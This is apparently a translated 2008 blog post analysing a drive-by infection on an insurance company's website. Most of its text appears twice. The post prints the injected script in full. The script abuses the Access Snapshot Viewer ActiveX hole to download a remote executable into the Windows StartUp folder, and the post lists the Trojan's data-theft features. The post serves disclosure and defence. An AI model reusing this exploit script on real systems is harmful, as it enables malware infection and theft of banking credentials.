Viral marketing has become literally viral
Two days ago, the so-called “Easter egg” appeared on the alfastrah.ru website - if you clicked 5-6 times to the phone number in the upper right corner of the header of the site, you started playing a movie of erotic content. Details of the viral action are described here .
It's no secret that viral marketing is focused on very fast distribution - visits to the site have grown exponentially. In some forums, there were warnings that when entering the site, Kaspersky swears and says that a Trojan is sitting on the site. In a conversation with the staff of Kaspersky Lab, this information was confirmed. Thus, "viral marketing" turned literally viral . Here are some expert comments.
Analysis of the site showed that, in addition to the erotic cartoon, there is a virus.
')
Analysis of the site showed that, in addition to the erotic cartoon, there is a virus. An interesting way to implement: it is inserted neatly into the center of the page. This is what loads (the script is not even encrypted): google-analyze.com/counter/index.php .
HTTP / 1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache / 2.2.3 (CentOS)
X-Powered-By: PHP / 5.1.6
Vary: Accept-Encoding, User-Agent
Content-Length: 475
Connection: close
Content-Type: text / html
<object classid = "clsid: F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id = "attack"> </ object>
<script>
var arbitrary_file = " google-analyze.com/tracker/load.php ";
var destination = 'c: / Documents and Settings / All Users / Start Menu / Programs / StartUp / browsser.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot (arbitrary_file, destination);
</ script>
<embed src = "pdf.php" type = "application / pdf" width = 100 height = 100> </ embed>
The virus has a peculiarity - blocking the download when re-visiting - the virus gets onto the computer only when it is first booted from an IP address, when it is repeated no longer. So if they look from the office where they go through a proxy, only the first person will suffer.
An unclosed vulnerability was used to embed the site.
The beast is one-in-one repeating PoC, published here: http://www.xakep.ru/post/44605/Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Exploit.txt
The bot's functionality, in addition to standard installation procedures itself in the system, implementation of running processes, combating some antiviruses, providing anonymous socks- and http proxy server services, includes the most powerful information theft procedure:
Despite appeals to Alpha insurance from the LC and other individuals (I myself, for example, wrote 2 letters to them), the vulnerability is still not eliminated, and a Trojan is hanging on the site - it seems to be a new one.
I want to thank the employees of the Kaspersky Lab for the speed and technical comments.
It's no secret that viral marketing is focused on very fast distribution - visits to the site have grown exponentially. In some forums, there were warnings that when entering the site, Kaspersky swears and says that a Trojan is sitting on the site. In a conversation with the staff of Kaspersky Lab, this information was confirmed. Thus, "viral marketing" turned literally viral . Here are some expert comments.
Analysis of the site showed that, in addition to the erotic cartoon, there is a virus.
')
Analysis of the site showed that, in addition to the erotic cartoon, there is a virus. An interesting way to implement: it is inserted neatly into the center of the page. This is what loads (the script is not even encrypted): google-analyze.com/counter/index.php .
HTTP / 1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache / 2.2.3 (CentOS)
X-Powered-By: PHP / 5.1.6
Vary: Accept-Encoding, User-Agent
Content-Length: 475
Connection: close
Content-Type: text / html
<object classid = "clsid: F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id = "attack"> </ object>
<script>
var arbitrary_file = " google-analyze.com/tracker/load.php ";
var destination = 'c: / Documents and Settings / All Users / Start Menu / Programs / StartUp / browsser.exe';
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot (arbitrary_file, destination);
</ script>
<embed src = "pdf.php" type = "application / pdf" width = 100 height = 100> </ embed>
The virus has a peculiarity - blocking the download when re-visiting - the virus gets onto the computer only when it is first booted from an IP address, when it is repeated no longer. So if they look from the office where they go through a proxy, only the first person will suffer.
An unclosed vulnerability was used to embed the site.
The beast is one-in-one repeating PoC, published here: http://www.xakep.ru/post/44605/Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Exploit.txt
The bot's functionality, in addition to standard installation procedures itself in the system, implementation of running processes, combating some antiviruses, providing anonymous socks- and http proxy server services, includes the most powerful information theft procedure:
- The Trojan steals the contents of Protected Storage, which contains user passwords.
- Formgrabber. The Trojan intercepts any data sent to the forms through the browser. Controlled addresses from which information is intercepted are, as a rule, addresses of banks and payment systems. Thus, accounts are stolen.
- Bypass virtual keyboards. The Trojan intercepts mouse clicks and takes a screenshot of the screen at this moment.
- Substitution sites and pages. This is a very interesting method, previously used in Nuclear Grabber. When a user attempts to access one of the sites monitored by the Trojan, either the request is redirected to a fake phishing site or a new data entry field is added to the original site page. The content of the page is replaced directly on the user's computer, even before being displayed in the browser!
- Theft of certificates.
Despite appeals to Alpha insurance from the LC and other individuals (I myself, for example, wrote 2 letters to them), the vulnerability is still not eliminated, and a Trojan is hanging on the site - it seems to be a new one.
I want to thank the employees of the Kaspersky Lab for the speed and technical comments.
Source: https://habr.com/ru/post/45546/
All Articles